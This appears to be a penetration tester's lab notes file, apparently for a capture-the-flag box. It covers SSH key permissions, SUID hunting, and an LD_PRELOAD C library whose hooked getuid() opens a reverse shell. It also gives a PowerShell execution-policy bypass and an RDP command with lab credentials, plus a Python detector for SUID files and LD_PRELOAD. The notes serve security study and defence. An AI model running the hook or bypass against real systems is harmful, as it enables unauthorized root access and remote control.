# Notes

> Reconnaissance

If you find an `id_rsa` key, run `chmod 600` on it before using it (ssh refuses private keys with looser permissions).

> Initial Access

> Privesc

* [ ] Find SUID/SGID files (u+s, g+s)
* [ ] On Linux/Unix, review running processes and services for anything suspicious, e.g. **`systemctl list-units --type=service --all`**
* #### LD\_PRELOAD bypass

Here is a library you can compile to abuse the `LD_PRELOAD` env variable:

```c
#include <unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>

/* Replacement for libc's getuid(): runs as soon as the preloaded target calls it. */
uid_t getuid(void){
	unsetenv("LD_PRELOAD");  /* keep the child shell from re-triggering this hook */
	system("bash -c \"sh -i >& /dev/tcp/127.0.0.1/1234 0>&1\"");
	return 1;
}
```
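A defender-side counterpart to the two items above (the SUID/SGID hunt and the `LD_PRELOAD` library), added here as an example and not part of these notes: it audits a directory tree for setuid/setgid files against a baseline and checks live processes for an `LD_PRELOAD` variable by parsing `/proc/<pid>/environ`. The baseline paths are assumptions, not a real inventory.

```python
import os
import stat
from pathlib import Path

# Constructed baseline of expected setuid binaries (assumption: take it from a clean image).
EXPECTED_SUID = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su"}

def is_suid_or_sgid(mode):
    """True when `mode` describes a regular file with u+s or g+s set."""
    return stat.S_ISREG(mode) and bool(mode & (stat.S_ISUID | stat.S_ISGID))

def find_suid_files(root):
    """Walk `root`; return sorted setuid/setgid regular files (symlinks not followed)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:  # vanished or unreadable entry
                continue
            if is_suid_or_sgid(st.st_mode):
                hits.append(path)
    return sorted(hits)

def unexpected_suid(paths, allowlist=EXPECTED_SUID):
    return [p for p in paths if p not in allowlist]  # anything outside the baseline

def preload_from_environ(environ):
    """Parse /proc/<pid>/environ (NUL-separated KEY=VALUE) and return the LD_PRELOAD
    value or None; a privileged process still carrying it is the footprint of the hook above."""
    for entry in environ.split(b"\0"):
        if entry.startswith(b"LD_PRELOAD="):
            return entry.split(b"=", 1)[1].decode(errors="replace")
    return None

def scan_processes(proc="/proc"):
    """Return {pid: LD_PRELOAD value} for live processes that carry the variable."""
    findings = {}
    if not os.path.isdir(proc):
        return findings
    for entry in filter(str.isdigit, os.listdir(proc)):
        try:
            data = Path(proc, entry, "environ").read_bytes()
        except OSError:  # process exited, or belongs to another user and we are not root
            continue
        if (value := preload_from_environ(data)):
            findings[int(entry)] = value
    return findings
```

Run `unexpected_suid(find_suid_files("/"))` and `scan_processes()` as root on a host you suspect; other users' `environ` files are unreadable without root, so an unprivileged run only sees your own processes.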

> Post-exploitation

* [ ] On Windows, start `powershell -ep bypass` and then list every file recursively to pick out the interesting ones:

```powershell
Get-ChildItem -Recurse -File -ErrorAction SilentlyContinue | Select-Object FullName
```

* [ ] If port 3389 is open, try connecting with rdesktop or xfreerdp; `/drive:.,kali-share` shares the current directory of the attacker machine into the RDP session.

```bash
xfreerdp /v:cyberlens.thm /u:CyberLens /p:HackSmarter123 /size:80% /drive:.,kali-share
```
